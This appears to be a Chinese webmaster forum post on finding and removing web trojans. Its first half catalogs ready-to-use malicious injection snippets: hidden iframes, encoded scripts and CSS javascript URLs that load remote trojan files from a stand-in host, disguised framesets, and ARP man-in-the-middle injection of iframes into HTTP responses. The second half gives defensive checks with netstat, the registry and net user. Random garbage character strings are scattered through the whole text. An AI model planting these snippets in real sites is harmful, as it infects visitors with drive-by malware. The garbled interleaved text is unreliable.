【即将关站通知●已关闭注册功能】,倒计时剩余:计算中...

[建站技巧] 常见的网页木马自查及处理方法!

[复制链接]
魔趣吧站长魔趣吧官方成员 实名认证 发表于 2017-11-19 20:45:44 | 显示全部楼层 |阅读模式
网页木马代码大全:
+ y9 d; J: G! y6 D7 n: ?( M8 ]4 }  i 常见的网页木马自查及处理方法!
3 [- [3 S1 L, M一:框架挂马. m$ y0 R. P* A2 I
5 F5 L% k) G) V# v+ Q4 u

" }! \% K) q' A2 L   <iframe src=地址 width=0 height=0></iframe>
/ Z5 q! Q8 n, L  }* @
, |3 Z, D( ^* O% f8 {
( j+ C; `- W  g( }& q
二:js文件挂马   Y5 F8 \" l& u" J( |. p
   
# O& M1 C9 ?' }8 K   首先将以下代码 8 e& o& k/ p% Z
   document.write("<iframe width=’0’ height=’0’ src=’地址’></iframe>"); 4 s5 P6 ~' c+ J4 ~8 t) b0 Q2 a
   保存为xxx.js, & ]7 N4 m$ C5 T0 R/ n* e
   则JS挂马代码为 + P1 a6 A# ^2 g' U1 {1 J$ _
   <script language=javascript src=xxx.js></script> 8 e& _* J/ l1 R5 z7 J# [& D0 ^* H

, `  S. X% Q& O% O  z  y# u: Q
; ]6 n; @1 M; y5 \. W  a% B
三:js变形加密
% c, A6 \# ~" r/ z# _# Q- J   
; `: A4 J$ Z  W# f  G   <SCRIPT language="JScript.Encode"          src=http://www.xxx.com/muma.txt></script>  
- S9 u6 G) s; [7 X( {; t   muma.txt可改成任意后缀
% D0 d4 x3 C* u7 |: {% Y  l* C8 _四:body挂马; i8 e) u8 P+ Z6 W; [* h$ I6 }
! T0 o3 ]. G  u6 |
2 ^* z4 ~# o: t1 |; {
   <body></body>, K* U0 [. x) K

1 g7 o! x6 z4 d4 x. T& i# |# H3 K

3 _4 s5 V: Q; P) Y) J五:隐蔽挂马
# X/ x7 X* d8 I% K/ s3 w+ [# N, @) }. I& ^

$ J$ j9 U7 h* B# b7 e( l   top.document.body.innerHTML = top.document.body.innerHTML +    ’\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>’;! U( `" g& Q" d& b. x

8 i, _: v# q2 z; L+ f6 h) K
" E% V) m3 y7 W6 L5 o& f: f7 y
六:css中挂马: c' Z" I) [0 s! Z$ b) s3 F

" F; J7 ]" w6 |* O. g5 d: F. l

8 j0 d/ S" q. _8 o( j   body {  
$ ^# U4 O9 t0 H   background-image: url(’javascript:document.write("<script          src=http://www.XXX.net/muma.js></script>")’)}
$ |0 w+ ?; }8 P$ V
  g* H: r- F& V

, n( F; Q* C0 f/ `七:JAJA挂马* z1 ~$ L6 g+ i9 s2 }+ p6 X* |

$ ~0 ^/ C/ l1 `# A! C  n* r
% m( G. {; F1 a
  <SCRIPT language=javascript>       , Z5 h( a1 l7 T/ d# V$ x% i5 z# \
  window.open  ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro  llbars=no,width=1,height=1");   
, |" w- J2 Q( r9 F. N  S  </script>
/ e, U, r4 s+ q, V# f7 `; T% F
( a2 X' C9 @$ A; q4 C; t. V4 ]
5 |; y1 y  k- J, p" u; V4 k- E% G
八:图片伪装
; ^: ^/ {7 v2 x8 U4 G
! k) d6 M- }) Q

" h# J4 p2 Y+ \  c  <html> ( P# ]+ F" F2 Y* g' w7 M3 B
  <iframe src="网马地址" height=0 width=0></iframe>
8 d3 i6 k" i/ V. q" V/ g  </center>
! E7 U0 x2 f  v" u# c% f1 @  </html>
; w" E5 B" i# X3 R
4 C* j. H7 n, \" r" V九:伪装调用:
; c  C; S. @; \/ W! g  r; z' J) n; M, G9 U5 d

' j4 J% R5 ^4 f- |# p# x' v5 t   <frameset rows="444,0" cols="*">
# {& B: Q- d8 b' A/ Z; i) |   <frame src="打开网页" framborder="no" scrolling="auto" noresize    marginwidth="0"margingheight="0"> + L# P4 n1 F5 x4 U, J
   <frame src="网马地址" frameborder="no" scrolling="no"   noresize    marginwidth="0"margingheight="0"> 0 M* n) {1 }3 z. r) i5 S2 ?
   </frameset>
" M# ?" v6 F/ e1 B+ M$ |1 H+ D/ i" B& [: l) D! `
十:高级欺骗$ S9 Y5 x$ L* H" ?5 X0 }9 H

3 ]6 U+ d" b! ~/ [$ G- t9 X, A
) b6 c9 M' Q( @
   <a href="https://www.moqu8.com(迷惑连接地址,显示这个地址指向木马地址)">
" M  x2 p( m* F8 s页面要显示的内容 </a> 8 \7 d, h& G1 @
<SCRIPT Language="JavaScript">
/ u7 r; s1 {! \8 Afunction www_moqu8_com () 7 n! ^0 W8 m% S( }: {  R1 B
{ " E9 z! J  u8 [6 [! `1 L
var url="网马地址"; 9 Y$ w! W/ s' J3 D5 @
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); 2 G  ~- l" f: w
} * B( D# D7 X/ |4 {  k! h- J% ^
</SCRIPT>/ m" y7 x' f% V/ u
+ U3 E# y) N* R9 }/ V9 W& O/ w3 D) _
4 q6 P- ]0 Z6 Q4 k$ G
十一: 超级网马—通过arp欺骗来直接挂马 8 m9 O& N  b+ y$ B* F) F9 T

: b6 [" k) X- n
8 f  ?. f8 w& q1 v
原理:arp中间人攻击,实际上相当于做了一次代理。   D+ b, a5 u7 X1 B* {
" Z' A% N. t1 l& Z8 w% ^. s8 c) U8 d

8 A- `) `$ H  c7 X2 |% O正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机  
! c& _; V+ v7 x. M4 l# S) O% s) Aarp中间人攻击时候: A---->C---->B  
  ?' o0 f) W+ c8 S& o( ]% @* J: oB---->C---->A  
% O% y! |0 o- c实际上,C在这里做了一次代理的作用 : i' A3 T6 I3 w" d( i7 z2 l3 `

; d/ N$ ?6 c3 w5 O) [: }* F

- Y/ P: R; v8 L$ q/ @2 M4 S* a" n那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。* |; g* N$ Z. |4 D+ ^
7 `5 Z- d1 Z0 P- m
5 e9 `. @3 l# C6 y( l- g" _
如何处理网页木马:6 b" j4 {* f# L: G4 e' B
常见的网页木马自查及处理方法! 3 |; m( m6 D# D( ~1 E

6 w; f! U, \: ?( O; d' y

8 E9 t$ ~- }# J% {% M& ?4 z! {5 G1、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm$ }3 _) U: [3 _

2 s3 F, s9 C9 L0 e

7 b& Z# T" k7 q" r/ y5 l7 ]2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...# ^. }+ H8 ?% Y
0 v! [/ S/ g/ A9 W- ?. y
! t" U6 u' ?! M* C
3、修改键值wm.htm为wm_nnd.htm。
; L# L. J) K! U% s) R4 K. ~2 u: y3 n5 v( N8 e5 x
% x; X7 Q& `4 j7 I, @3 C
4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。
! M3 e( m( F: C" r4 G  cain.exe,据说是密码嗅探器。
1 x  Z" Q+ }& _( @$ u3 p
. S. P: Y/ W# [  ^% |) w
/ }+ ~* h! B  O; h2 ^% |8 V8 r+ S
5、修改键值cain.exe为cain_nnd.exe。
& ?% f7 P  R8 S: }: i/ N- j  Z8 m1 r3 ~

; ?1 {% U9 h8 ^9 }5 F! Y- I6 ?6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。
, j8 {2 L- W2 U6 ~' j* d7 ~: u( z* N) j3 ]& e8 n

+ q9 {4 u& R, v7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。0 }2 V9 p, _4 B1 w) B

4 l* K8 A% b& j. Q. h7 t
! z7 m( M0 ]) k5 ~
8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用net start,查看可疑程序
$ J- |9 ?: i, x$ i7 B
* D' c; |4 X. P2 \
5 C* D* U8 f7 ?& f# \3 G6 w
9、发现temp*.exe(全名记不清了),立马net stop server 。
# Q' @* V7 a" ^$ w% ~* c- l
+ g  C  i+ P5 ~) r# {$ b8 O# Y

( J% E8 p* V% ]5 X1 \* I8 _10、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。
( W( d0 h1 \6 X0 b  [
( B3 P4 o2 B* |( C

6 K5 j8 m# r2 d8 G11、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。
/ |: F/ |/ D  Q
' w7 \' |% F7 z5 C+ ^
9 t0 k& s6 O, e$ a. T8 B4 h, {
12、观察了几天,没再发生挂马的现象。8 A6 f* y$ [1 Q3 l
  Z4 Q8 @6 F9 v) e: l4 ]( ?
- k. @  q0 D/ o. |: l% H
另外,通过检测网络连接查看服务器是否中了木马或病毒# `& w: e/ t2 b

; R# {  R# p- ^. ]* Y: K

+ ]$ N% K& O2 N" Y; N/ r& r# q1、使用netstat -an 查看所有和本地计算机建立连接的IP。% Q, C' f$ w( U) a4 v* A8 m
  M" ?2 m. d( [7 ~) n
9 ^2 V5 V( r6 e9 t  B( Q
2、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。 通过这个命令的详细信息,可以完全监控计算机上的连接,从而达到控制计算机的目的。" ]  k  Z+ u: U* k4 K* t
) [  U3 m2 E# F  _1 @8 y
+ n' e1 k1 ^$ z  w% Y
3、手工制作bat程序,生成网络连接日志文件供站长分析:bat文件代码如下
& _' I8 C$ r1 R* Z3 q/ S: Z, x( U0 a4 D* I3 O; f, S' i

) e8 B* e) S9 i1 M REM 注释:监控的时间
7 v1 G. a3 h! I  c time /t>>Netstat.log - C' p" N. F$ k# {* T
REM 每隔30秒,把服务器上通过tcp协议通讯的IP和端口写入日志文件   v$ w) f+ `# a# W7 c! R* p
Netstat -n -p tcp 30>>Netstat.log
& y8 M4 d/ M" T4 w! K  
8 N& [/ X/ D; O! D! | 注意:要谨慎使用,这会给服务器带来性能影响。最好,在服务器发生异常,怀疑中木马或病毒时,用来分析网络连接日志。
; ?/ O% X  {4 L7 D' v# z- I  8 d8 A) j" n: X- q8 W
仅仅这些还不够,说说更严重的:! d7 r' `% X* `1 }; A
. X$ a/ E* T, ]+ t5 @7 \

+ F7 d* h2 h. m6 \1、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。“它们”激活一个系统中的默认账户,但这个账户是不经常用的, 然后使用工具把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。 * T, u% N3 m' W+ B2 j* M  F
   
0 j! t5 s  b2 N0 i8 F2 U  K" a2、赶快检测系统帐户:
, \5 P4 n& }+ N" k/ ~ a、在命令行下输入net user,查看计算机上有些什么用户。
2 C; ~+ y8 u5 Z( S b、使用“net user 用户名”查看这个用户属于什么权限的及登录时间等。 8 Q; F; ?  ?. `, d" p8 I
c、一般除了Administrator是administrators组的,如果你发现一个系统内置的用户是属于administrators组的,
5 g, x- F& q8 O$ o    那么别人在你的计算机上克隆账户的概率为90%。 & N5 k% s5 s; v# @& P
d、是使用“net user 用户名 /del” 来删掉这个用户,还是修改其它配置,这你说了算。) m6 _' e$ ~  I5 y. \5 M! W
: e% Y  c* y2 ^% Y5 g( F

魔趣吧版权声明1,本文内容及相关资源来源于网络,版权归版权方所有!本站原创内容版权归本站所有,请勿转载!
2,本文内容仅代表作者本人观点,不代表本网站立场,作者文责自负,本站资源仅供学习研究,请勿非法使用,否则后果自负!请下载后24小时内删除!
3,本文内容,包括但不限于源码、文字、图片等,仅供参考使用,本站不对其安全性,正确性等作出保证。但本站会尽量审核会员发表的内容
4,如您认为本文内容侵犯了您的权益,请与我们联系!我们将在5个工作日内做出处理!本站保留全部修改、解释、更新本声明的权利魔趣吧

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

在线支持
关闭
欢迎来到魔趣吧
如果你有建站技术问题、仿站需求、模板插件修改需求,请联系我们的技术支持!高效率,低价格的帮你搞定!
请认准魔趣吧唯一官网:www.moqu8.com,谨防假冒网站!

一般问题请到【求助区】发帖咨询(免费)!

邮箱咨询:
winkill2012@qq.com

邮箱咨询需注明:资源地址+本站用户名+具体问题,三者缺一不做处理。非本站资源不处理!
在线支持
快速回复 返回列表

关于魔趣吧|魔趣建站

魔趣吧,志在打造全国最大的建站资源共享平台。 本站提供海量免费的建站资源,包括WordPress模板、Discuz精仿模板、PHPWind模板、phpcms模板、Discuz精仿插件、帝国cms模板、织梦模板等上万精品模板!同时,提供各种建站素材、JS特效、整站程序源码!
服务中文站长,传播分享精神!建站,就来魔趣吧!!
2015-2024 魔趣吧 ( 豫ICP备2021024354号 )   豫公网安备41030402000182号 百度统计
HTTPS安全认证
|网站地图 | 已运行:天 
温馨提示:本站所有资源、教程、源码,不得用于非法站点及用途,否则,本站将终止提供任何服务! Powered by Discuz! Licensed